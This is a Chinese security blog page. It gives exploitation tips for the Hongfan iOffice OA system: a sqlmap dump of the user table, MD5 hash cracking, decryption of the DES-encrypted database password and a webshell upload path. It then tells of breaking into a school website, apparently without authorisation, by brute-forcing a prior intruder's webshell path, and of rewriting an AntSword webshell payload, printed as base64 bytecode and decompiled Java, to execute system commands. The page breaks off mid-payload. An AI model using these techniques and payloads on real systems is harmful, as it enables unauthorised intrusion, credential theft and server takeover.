红帆ioffice渗透测试利用技巧

前言

最近在审计红帆ioffice .net 的代码,发现了许许多多的漏洞。如多处的未授权的SQL注入,前后台的任意文件下载,前台的任意文件写入,已经被修复的前台任意文件上传,还有任意用户登录漏洞。因此写下自己对红帆ioffice漏洞利用技巧。

红帆ioffice利用技巧

红帆ioffice在测试过程中的问题

用户密码解密

过程分析

红帆ioffice的默认数据库是ioffice,默认用户名是ioffice,存放用户数据的表是mrbaseinf

如当我们测到SQL注入时,想要进后台,所以直接使用命令

python3 sqlmap.py -r 2.txt -D ioffice -T mrbaseinf -C "loginid,Pwd,sysSam,CheckSam" --dump

sqlmap传送门

image

拿到密码后,这个时候就应该考虑到解密的问题了。

红帆的默认密码是96-E7-92-18-96-5E-B7-2C-92-A5-49-DD-5A-33-01-12,即111111

实际上这里是md5(111111),即每两个字符中添加一个-。

image

image

从代码层面分析发现,这段算法就是md5,不可逆,因此只能考虑去掉-后,在通过cmd5hash值,得到明文。

image

cmd5传送门

image

当然cmd5也不是所有hash都能查到的,这里就得借助sam了。

注:sam的全称是security account manager,即安全账号管理

红帆在设计的时候,可能考虑到了hash不可逆的因素,怕用户忘记密码,导致密码无法被解,因此在数据表字段设计的时候,增加了sysSamcheckSam。简单的说,这两个值解出来后,可能就是pwd字段的明文。

image

通过查询默认的checkSam或者sysSam的值时,会发现。
image

在使用sql语句更新时,又增加了sysSam

注:此处文档中admin的密码是111111

image

因此如果解密不出密码时,覆盖密码最好是添加一个sysSam

image

利用总结

用sql注入获取数据,进后台时,可以利用该方法尝试解密密码。

配置文件dbpwd解密

过程分析

.net的配置文件是web.config数据库连接信息是在appSettings节点中。

查看ioffice的配置文件,发现数据库的连接密码被加密了,因此就需要解密该密码了。

image

.net加载web.config的节点,是通过System.Web.Configuration.WebConfigurationManager

如这里需要加载appSettings,那么则需要调用WebConfigurationManager下AppSettings方法去获取到配置文件的相关参数的。

通过dnspy反编译/ioffice/bin目录下的dll文件

dnspy传送门

iOWebCSP.dll文件中,即iOWebCSP对象下的GetWebDbConnectString方法中,我们可以看见ioffice是如何连接数据库的。

image

可以看见,在第131行中有这样一段代码

1
text3 = this.b(WebConfigurationManager.AppSettings["dbpwd"]);

获取到dbpwd后,调用当前对象下的b方法进行解密操作。

image

跟进后,发现也就是一个des加解密的问题。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
private string b(string A_0)
{
if (Operators.CompareString(A_0, "", false) == 0)
{
if (true)
{
}
}
else
{
try
{
byte[] array = Convert.FromBase64String(A_0);
return Encoding.UTF8.GetString(this.des.CreateDecryptor().TransformFinalBlock(array, 0, array.Length));
}
catch (Exception ex)
{
return "";
}
}
return "";
}

跟进到des后发现,密钥和偏移量是直接在构造方法iOWebCSP中被初始化了。

image

直接编写解密脚本。

image

拿到明文密码就就想着要登录数据库咯。

cnstr中,server=.代表server=127.0.0.1:1433database="ioffice",还不知道数据库连接用户是谁。

继续往下看。

image

变量d是直接在构造方法中被初始化成了ioffice,即当前数据库用户(默认数据库用户)是ioffice

最终成功连上数据库

image

利用总结

ioffice任意文件下载漏洞,当获取到web.config时,可解密密码,恰好1433开放,就能直接起飞。

当拿到服务器权限时,进不去后台,可通过此方法连上数据库,再解密用户密码,能登录后台。

webshell 解析问题

过程分析

审计时发现了任意文件写入和任意文件上传漏洞后(不会重命名),尝试利用,默认写入和上传路径都是在/ioffice/upfiles/目录下,分析代码和实际测试发现,文件不会重命名。

最开始是在/ioffice/upfiles/目录下传aspxashxasmx.net 可解析的脚本文件。直接访问,发现是会被重定向的。

image

注:文件存在和不存在都会被重定向

后来有师傅告诉我说,红帆都是传的asp马。

但是实际测试发现,asp马的执行权限非常的低,所以还是得传.net的马。

image

最后测试发现,可以传到/iOffice/Identity/目录下。

image

利用总结

直接跨目录将webshell写到/iOffice/Identity/即可。

总结

红帆ioffice,现在互联网产品的案例是很少了的,代码大概也都是七八年前的那批程序员写的,所以漏洞许许多多各种各样。通过审计前人留下的坑,增长了自身对漏洞代码的认识,这个还是很不错的。

在审计红帆OA时,还发现可能存在xxe漏洞和Newtonsoft.Json反序列化漏洞。但是由于默认配置原因,利用不成功,还是比较遗憾的。


蓝凌OA(treexml.tmpl)RCE审计与漏洞利用

漏洞说明

这里实际上是两个漏洞,一个springboot的权限绕过漏洞,一个是bsh rce漏洞。

Read more
用友 NC bsh.servlet.BshServlet RCE 利用方法

用友bsh rce利用方式

Read more
两次非常规方式获取权限之旅

前言

五月处有人要我帮她看看她专升本的学校有没有漏洞,五月底又有人找我帮他看看他实习公司安排的站点有没有漏洞。因此记录一下这次获取权限的另类思路。

权限获取

帮妹妹获取学校权限

五月初的时候,某个晚上,有个女孩子私聊我了,问我怎么绕过修改密码的界面,此界面是由于使用初始密码登录后,强制要求修改符合密码复杂度的密码。

测试一下重置流程,会重新返回登录界面,而不是后台首页,因此无法去通过修改响应信息的关键字,以及直接访问后台首页的url进行绕过。

image

由于这个年龄,晚上睡不着很正常,所以就帮妹妹看了一下这个学校。

信息搜集

妹妹告知了我该学校的一部分信息(如工号和学校情况),然后我就想着能不能拿一个站点权限,毕竟不能拿shell的安服仔不是一个好的安服仔。

在信息搜集时发现一个可能可以被获取权限的站点。

image

疑是可被getshell的站点

image

但是通过测试发现、此处无上传漏洞。

但是在对js分析的时候,发现了一个图片管理的接口。

image

此处可以预览部分网站被上传的图片。

发现历史入侵痕迹

并且也发现了疑是webshell的文件。

入侵时间主要是去年年中和今年年初。

image

image

并在其中一个图片中找到了webshell的代码(由于写文章的时间,和之前测试时不一样,原先发现的webshell部分已经被删除)

image

那么这里就大胆猜测,应该有一个技术还不错的骇客成功拿到了该站的权限。

分析文件上传后的路径

通过此处分析可知,上传成功后,文件被保存在服务器的路径是/uploadfiles/文件后缀/年月/日/文件名
image

那么就有可能存在一个jsp或者jspx的马在服务器。

分析webshell后门路径

image

此时直接访问以下两个目标
http://x.x.x.x/uploadfiles/jsp
http://x.x.x.x/uploadfiles/jspx

发现存在jspx目录,此处就说明,该站点曾经被上传过一个jspx的webshell。

此时就直接用burp去爆破时间节点,然后再爆破shell路径。

时间爆破范围应该是在2020年至2022年。

image

通过爆破,找到了webshell的上传的年月时间

image

继续爆破找到了日

image

此时只差确定webshell的文件名了,这里随缘爆破1-9999。

emmm,其实前面不应该打码的。

image

结果是没想到爆出来了一个jspx

成功帮妹子getshell

image

直接github搜这个title

还是放和妹子的聊天截图吧

image

image

此时告诉妹子,通过查询edu上该校漏洞的历史提交记录发现,当前时间节点无任何getshell的高危漏洞,因此是后门,被恶意上传不告知的。

image

image

image

image

通过cmd马写一个哥斯拉,直连,发现存在许多shell。

image

最后也希望该妹妹能够成功专升本啦。

image

帮弟弟获取某站点权限

image

周一打完攻防,有个师傅私聊我了,要我帮他看看站,恰好回到酒店无聊就帮他看了一下。

这个目标是他的实习公司要他测的,并且有限制要求,不能传马,还给了一个账号名的提示,没给密码。

信息搜集

没给密码,看了一下登录框和登录流程,有验证码,所以懒得爆破了,试了一下常规的弱口令,没进去。

image

分析站点结构

在对站点js进行分析时发现了一个上传接口

试了一下,txt都无法传,无法正常用。

image

继续找接口
image
发现了附件管理接口,直接访问

发现历史webshell

访问接口后,直接搜jsp,看有没有啥奇怪的jsp文件被传在附件了,结果发现了疑是webshell的文件。

并且有6/2=3

image

此时和弟弟沟通

image

此时就要想办法知道这三个shell的代码

此时发现还存在一个文件下载的接口

image

直接构造数据包,并通过附件管理接口的fileid去查询webshell的内容。

第一个jsp,好像没用

image

第二个马

image

没见过,百度搜了一下这个马,原来是蚁剑的马(有没有觉得这两个字特别难打)

尝试直连。

image

连接被重置,所以就想到直接发送命令执行的代码。

尝试命令执行

由于无法通过蚁剑直连目标的webshell,所以此处直接尝试连接一个可以正常连接蚁剑的马。

image

将此数据,先url解码,再base64解码,最后输出到字节码class文件中。

1
yv66vgAAADEBCQoAOQB4CQBbAHkJAFsAeggAewkAWwB8CAB9CQBbAH4IAH8JAFsAgAoAWwCBBwCCCgALAHgIAIMIAIQIAIUIAIYLADMAhwsAMgCICwAzAIgLADIAiQoAWwCKCQBbAIsKAFsAjAoACwCNBwCOBwCPCgAaAHgIAJAKABoAkQoAGQCSCgAaAJILADMAkwoACwCSCgBbAJQKAJUAlggAlwoAmACZCACaCACbCgBbAJwIAJ0IAJ4KAEkAnwoAoAChCgCgAJIKABoAogoAOQCjCgA3AKQHAKUHAKYHAKcIAKgKADcAqQgAqgcAqwoANwCsBwCtCgCuAK8IALAIAFwKADcAsQoAsgCzCgCyALQIAF4KAFsAtQcAtggAtwcAuAkAuQC6CgCuALMKADcAuwoAuQC8BwC9CgA3AL4KAL8AwAoAOQCSCgC5AMEKAEkAwgoASQDDCgBJAMQIAMUIAMYKAEkAxwgAyAgAyQoANwDKCAByCADLCADMCgA3AM0HAM4BAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAHZW5jb2RlcgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAmNzAQAMcmFuZG9tUHJlZml4AQAQZGVjb2RlckNsYXNzZGF0YQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAtTeXNJbmZvQ29kZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAPV3d3Um9vdFBhdGhDb2RlAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAhwYXJzZU9iagEAFShMamF2YS9sYW5nL09iamVjdDspVgEACGFzb3V0cHV0AQAGZGVjb2RlAQAKRXhjZXB0aW9ucwEAEkJhc2U2NERlY29kZVRvQnl0ZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAApTb3VyY2VGaWxlAQAJSW5mby5qYXZhDABlAGYMAFwAXQwAXgBfAQAGYmFzZTY0DABgAGEBAARVVEY4DABiAGEBAAEyDABjAGEMAG8AcAEAFmphdmEvbGFuZy9TdHJpbmdCdWZmZXIBAAw0YzZkODBkNmM2M2UBAAgxYzBmZmVkMQEADXZmYzU0MzBhNjRiYjYBAAl0ZXh0L2h0bWwMAM8A0AwA0QDQDADSAG4MAHIAbgwAZABhDABrAGwMANMA1AEAE2phdmEvbGFuZy9FeGNlcHRpb24BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACUVSUk9SOi8vIAwA0wDVDADWAGwMANcA2AwAcQBuBwDZDADaANABAAh1c2VyLmRpcgcA2wwA3ABuAQAHb3MubmFtZQEACXVzZXIubmFtZQwAbQBuAQABCQEAAS8MAN0A3gcA3wwA4ADhDADTAOIMAOMA5AwA5QDmAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAHWphdmF4LnNlcnZsZXQuanNwLlBhZ2VDb250ZXh0DADnAOgBAApnZXRSZXF1ZXN0AQAPamF2YS9sYW5nL0NsYXNzDADpAOoBABBqYXZhL2xhbmcvT2JqZWN0BwDrDADsAO0BAAtnZXRSZXNwb25zZQwA7gDvBwDwDADxAPIMAPMA9AwAdAB1AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MBAAJbQgcA9QwA9gD3DAD4APkMAPoA+wEAEGphdmEvbGFuZy9TdHJpbmcMAPwA/QcA/gwA/wEADAEBAQIMAQMBBAwAaQBqDABlAQUBAAxqYXZhLnZlcnNpb24BAAMxLjkMAQYBAgEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyDAEHAOoBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAD/AQgBAAliYXNlL0luZm8BAA5zZXRDb250ZW50VHlwZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAFHNldENoYXJhY3RlckVuY29kaW5nAQAMZ2V0UGFyYW1ldGVyAQAGYXBwZW5kAQAsKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1ZmZlcjsBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXByaW50AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAKc3RhcnRzV2l0aAEAFShMamF2YS9sYW5nL1N0cmluZzspWgEADGphdmEvaW8vRmlsZQEACWxpc3RSb290cwEAESgpW0xqYXZhL2lvL0ZpbGU7AQA1KExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0lJKUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdpc0FycmF5AQADKClaAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEADmdldENvbnN0cnVjdG9yAQAzKFtMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQAdamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3IBAAtuZXdJbnN0YW5jZQEAJyhbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACHBhcnNlSW50AQAVKExqYXZhL2xhbmcvU3RyaW5nOylJAQAJc3Vic3RyaW5nAQAVKEkpTGphdmEvbGFuZy9TdHJpbmc7AQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAAljb21wYXJlVG8BAAlnZXRNZXRob2QBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwAhAFsAOQAAAAYAAQBcAF0AAAABAF4AXwAAAAEAYABhAAAAAQBiAGEAAAABAGMAYQAAAAEAZABhAAAACAABAGUAZgABAGcAAABNAAIAAQAAACEqtwABKgG1AAIqAbUAAyoSBLUABSoSBrUAByoSCLUACbEAAAABAGgAAAAaAAYAAAAIAAQACQAJAAoADgALABQADAAaAA0AAQBpAGoAAQBnAAABEwAEAAcAAACrKiu2AAq7AAtZtwAMTRINThIOOgQSDzoFKrQAAxIQuQARAgAqtAACKrQAB7kAEgIAKrQAAyq0AAe5ABMCACoqKrQAAhkFuQAUAgC2ABW1ABYsKrYAF7YAGFenACE6Biy7ABpZtwAbEhy2AB0ZBrYAHrYAHbYAH7YAGFcqtAADuQAgAQC7ABpZtwAbLbYAHSostgAhtgAitgAdGQS2AB22AB+2ACOnAAU6BgSsAAIAGABZAFwAGQB6AKQApwAZAAEAaAAAAEYAEQAAABIABQATAA0AFAAQABUAFAAWABgAGAAjABkAMAAaAD0AGwBQABwAWQAfAFwAHQBeAB4AegAhAKQAIwCnACIAqQAkAAAAawBsAAEAZwAAAGwAAgAFAAAARBIkuAAlTBImuAAlTRInuAAlTiortgAoOgS7ABpZtwAbK7YAHRIptgAdGQS2AB0SKbYAHSy2AB0SKbYAHS22AB22AB+wAAAAAQBoAAAAFgAFAAAAKAAGACkADAAqABIAKwAZACwAAABtAG4AAQBnAAAApgAEAAgAAABauwAaWbcAG00rEiq2ACuaAEC4ACxOLToEGQS+NgUDNgYVBhUFogAcGQQVBjI6BywZB7YALQMFtgAuV4QGAaf/46cAFU4sEiq2AB1XpwAKLBIqtgAdVyy2AB+wAAEAEQBAAEMAGQABAGgAAAAyAAwAAAAwAAgAMQARADMAFQA0AC4ANQA6ADQAQAA5AEMANwBEADgASwA6AE4AOwBVAD0AAQBvAHAAAQBnAAABaAAEAAYAAADcK7YAL7YAMJkAIivAADHAADFNKiwDMsAAMrUAAiosBDLAADO1AAOnALUSNLgANU0qLBI2A70AN7YAOCsDvQA5tgA6wAAytQACKiwSOwO9ADe2ADgrA70AObYAOsAAM7UAA6cAek0rwQAymQByKivAADK1AAIqtAACtgAvEjy2AD1OLQS2AD4tKrQAArYAP8AAMjoEGQS2AC8SQLYAPToFGQUEtgA+KhkFGQS2AD/AADO1AAOnAChOKiq0AAK2AC8SOwO9ADe2ADgrA70AObYAOsAAM7UAA6cABToEsQADACkAYQBkABkAdACzALYAGQC3ANYA2QAZAAEAaAAAAGIAGAAAAEEACgBCABIAQwAcAEQAJgBFACkARwAvAEgASABJAGEAXABkAEoAZQBLAGwATAB0AE4AgQBPAIYAUACTAFEAnwBSAKUAUwCzAFoAtgBUALcAVgDWAFkA2QBXANsAXgABAHEAbgABAGcAAACtAAYABQAAAHUqKrQAFrYAQU0TAEISQwa9ADdZAxMARFNZBLIARVNZBbIARVO2ADhOLQS2AEYtKrYAL7YARwa9ADlZAyxTWQQDuABIU1kFLL64AEhTtgA6wAA3OgQZBAS9ADdZAxMASVO2AEoEvQA5WQMrU7YAS7YATLBNK7AAAQAAAHEAcgAZAAEAaAAAAB4ABwAAAGIACQBjACgAZAAtAGUAVABmAHIAZwBzAGgAAAByAG4AAgBnAAAAdQAEAAQAAAA1Az0qtAAJuABNPSsctgBOTKcABk4DPSq0AAUSBLYAT5kAFLsASVkqK7YAQSq0AAe3AFCwK7AAAQACABAAEwAZAAEAaAAAACYACQAAAG0AAgBvAAoAcAAQAHMAEwBxABQAcgAWAHQAIgB1ADMAdwBzAAAABAABABkAAQB0AHUAAQBnAAAA2wAGAAYAAACPAU0SUbgAJU4tElK2AFObAEoSVLgANToEGQQSVQO9ADe2AFYBA70AObYAOjoFGQW2AC8SVwS9ADdZAxMASVO2AFYZBQS9ADlZAytTtgA6wABEwABETacAMhJYuAA1OgQZBBJZBL0AN1kDEwBJU7YAVhkEtgBaBL0AOVkDK1O2ADrAAETAAERNLLA6BAO8CLAAAQAIAIgAiQAZAAEAaAAAADIADAAAAHsAAgB8AAgAfgARAH8AGACAAC0AgQBVAIIAWACDAF8AhACHAIYAiQCHAIsAiAABAHYAAAACAHc=

输出到字节码文件中

1
echo 数据 |base64 -d > 1.class

image

再用idea反编译1.class

image

代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
package com.test;  

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class Info {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder = "base64";
public String cs = "UTF8";
public String randomPrefix = "2";
public String decoderClassdata;

public Info() {
}

public boolean equals(Object var1) {
this.parseObj(var1);
StringBuffer var2 = new StringBuffer();
String var3 = "4c6d80d6c63e";
String var4 = "1c0ffed1";
String var5 = "vfc5430a64bb6";

try {
this.response.setContentType("text/html");
this.request.setCharacterEncoding(this.cs);
this.response.setCharacterEncoding(this.cs);
this.decoderClassdata = this.decode(this.request.getParameter(var5));
var2.append(this.SysInfoCode());
} catch (Exception var8) {
var2.append("ERROR:// " + var8.toString());
}

try {
this.response.getWriter().print(var3 + this.asoutput(var2.toString()) + var4);
} catch (Exception var7) {
}

return true;
}

String SysInfoCode() {
String var1 = System.getProperty("user.dir");
String var2 = System.getProperty("os.name");
String var3 = System.getProperty("user.name");
String var4 = this.WwwRootPathCode(var1);
return var1 + "\t" + var4 + "\t" + var2 + "\t" + var3;
}

String WwwRootPathCode(String var1) {
StringBuilder var2 = new StringBuilder();
if (!var1.startsWith("/")) {
try {
File[] var3 = File.listRoots();
File[] var4 = var3;
int var5 = var3.length;

for(int var6 = 0; var6 < var5; ++var6) {
File var7 = var4[var6];
var2.append(var7.toString(), 0, 2);
}
} catch (Exception var8) {
var2.append("/");
}
} else {
var2.append("/");
}

return var2.toString();
}

public void parseObj(Object var1) {
if (var1.getClass().isArray()) {
Object[] var2 = (Object[])((Object[])var1);
this.request = (HttpServletRequest)var2[0];
this.response = (HttpServletResponse)var2[1];
} else {
try {
Class var9 = Class.forName("javax.servlet.jsp.PageContext");
this.request = (HttpServletRequest)var9.getDeclaredMethod("getRequest").invoke(var1);
this.response = (HttpServletResponse)var9.getDeclaredMethod("getResponse").invoke(var1);
} catch (Exception var8) {
if (var1 instanceof HttpServletRequest) {
this.request = (HttpServletRequest)var1;

try {
Field var3 = this.request.getClass().getDeclaredField("request");
var3.setAccessible(true);
HttpServletRequest var4 = (HttpServletRequest)var3.get(this.request);
Field var5 = var4.getClass().getDeclaredField("response");
var5.setAccessible(true);
this.response = (HttpServletResponse)var5.get(var4);
} catch (Exception var7) {
try {
this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse").invoke(var1);
} catch (Exception var6) {
}
}
}
}
}

}

public String asoutput(String var1) {
try {
byte[] var2 = this.Base64DecodeToByte(this.decoderClassdata);
Method var3 = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
var3.setAccessible(true);
Class var4 = (Class)var3.invoke(this.getClass().getClassLoader(), var2, 0, var2.length);
return var4.getConstructor(String.class).newInstance(var1).toString();
} catch (Exception var5) {
return var1;
}
}

String decode(String var1) throws Exception {
boolean var2 = false;

try {
int var5 = Integer.parseInt(this.randomPrefix);
var1 = var1.substring(var5);
} catch (Exception var4) {
var2 = false;
}

return this.encoder.equals("base64") ? new String(this.Base64DecodeToByte(var1), this.cs) : var1;
}

public byte[] Base64DecodeToByte(String var1) {
Object var2 = null;
String var3 = System.getProperty("java.version");

try {
Class var4;
byte[] var7;
if (var3.compareTo("1.9") >= 0) {
var4 = Class.forName("java.util.Base64");
Object var5 = var4.getMethod("getDecoder").invoke((Object)null);
var7 = (byte[])((byte[])var5.getClass().getMethod("decode", String.class).invoke(var5, var1));
} else {
var4 = Class.forName("sun.misc.BASE64Decoder");
var7 = (byte[])((byte[])var4.getMethod("decodeBuffer", String.class).invoke(var4.newInstance(), var1));
}

return var7;
} catch (Exception var6) {
return new byte[0];
}
}
}

分析代码有点麻烦,所以直接想办法找直接命令执行的回显点。

发现这样一段函数方法,此处是用来测试连接,回显当前用户目录,操作系统类型,以及当前服务器的用户。

image

那就简单了,直接将此处SysInfoCode的代码修改成命令执行语句。

1
2
3
4
5
6
7
8
9
Process p=Runtime.getRuntime().exec("whoami");  
InputStream ins= p.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
String line=null;
InputStreamReader inputStreamReader=new InputStreamReader(ins);
BufferedReader bufferedReader=new BufferedReader(inputStreamReader);
while((line=bufferedReader.readLine())!=null){
stringBuilder.append(line).append("\n");
}

image

然后将其编译成字节码class文件。

image

再将Info.class文件进行base64编码。

image

在对数据进行url编码,然后发包

image

成功拿到网站的root权限。

执行id命令

1
passwd=yv66vgAAADQBUgoAPgCvCQBhALAJAGEAsQgAsgkAYQCzCAC0CQBhALUIALYJAGEAtwoAYQC4BwC5CgALAK8IALoIALsIALwIAL0LADgAvgsANwC%2FCwA4AL8LADcAwAoAYQDBCQBhAMIKAGEAwwoACwDEBwDFBwDGCgAaAK8IAMcKABoAyAoAGQDJCgAaAMkLADgAygoACwDJCgBhAMsKAMwAzQoAzgDPCADQCgDOANEKANIA0wcA1AoAKADVBwDWCgAqANcKACoA2AgA2QgA2ggA2woATgDcCgDdAN4KAN0AyQoAGgDfCgA%2BAOAKADwA4QcAoQcA4gcA4wgA5AoAPADlCADmBwDnCgA8AOgHAOkKAOoA6wgA7AgAYgoAPADtCgDuAO8KAO4A8AgAZAoAYQDxBwDyCADzBwCmCQD0APUKAOoA7woAPAD2CgD0APcHAPgKADwA%2BQoA%2BgD7CgA%2BAMkKAPQA%2FAoATgD9CgBOAP4KAE4A%2FwgBAAoBAQECCAEDCgBOAQQIAQUIAQYKADwBBwgAqAgBCAgBCQoAPAEKBwELAQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAB2VuY29kZXIBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcwEADHJhbmRvbVByZWZpeAEAEGRlY29kZXJDbGFzc2RhdGEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAD0xjb20vdGVzdC9JbmZvOwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEABHZhcjgBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAR2YXIxAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEdmFyMgEAGExqYXZhL2xhbmcvU3RyaW5nQnVmZmVyOwEABHZhcjMBAAR2YXI0AQAEdmFyNQEADVN0YWNrTWFwVGFibGUHAQsHAOkHALkHAPgHAMUBAAtTeXNJbmZvQ29kZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANpbnMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAA1zdHJpbmdCdWlsZGVyAQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEABGxpbmUBABFpbnB1dFN0cmVhbVJlYWRlcgEAG0xqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyOwEADmJ1ZmZlcmVkUmVhZGVyAQAYTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7BwEMBwENBwDGBwDUBwDWAQAKRXhjZXB0aW9ucwcBDgEAD1d3d1Jvb3RQYXRoQ29kZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAEdmFyNwEADkxqYXZhL2lvL0ZpbGU7AQAEdmFyNgEAAUkBAA9bTGphdmEvaW8vRmlsZTsHAJ0BAAhwYXJzZU9iagEAFShMamF2YS9sYW5nL09iamVjdDspVgEAE1tMamF2YS9sYW5nL09iamVjdDsBAAR2YXI5AQARTGphdmEvbGFuZy9DbGFzczsBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIYXNvdXRwdXQBAAJbQgEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAGZGVjb2RlAQABWgEAEkJhc2U2NERlY29kZVRvQnl0ZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IHAOcBAApTb3VyY2VGaWxlAQAJSW5mby5qYXZhDABrAGwMAGIAYwwAZABlAQAGYmFzZTY0DABmAGcBAARVVEY4DABoAGcBAAEyDABpAGcMAJ8AoAEAFmphdmEvbGFuZy9TdHJpbmdCdWZmZXIBAAw0YzZkODBkNmM2M2UBAAgxYzBmZmVkMQEADXZmYzU0MzBhNjRiYjYBAAl0ZXh0L2h0bWwMAQ8BEAwBEQEQDAESAJgMAKgAmAwAagBnDACDAIQMARMBFAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACUVSUk9SOi8vIAwBEwEVDAEWAIQMARcBGAwApQCYBwEZDAEaARAHARsMARwBHQEAAmlkDAEeAR8HAQwMASABIQEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIMAGsBIgEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIMAGsBIwwBJACEAQABCgEAAQkBAAEvDAElASYHAScMASgBKQwBEwEqDAErASwMAS0BLgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAHWphdmF4LnNlcnZsZXQuanNwLlBhZ2VDb250ZXh0DAEvATABAApnZXRSZXF1ZXN0AQAPamF2YS9sYW5nL0NsYXNzDAExATIBAB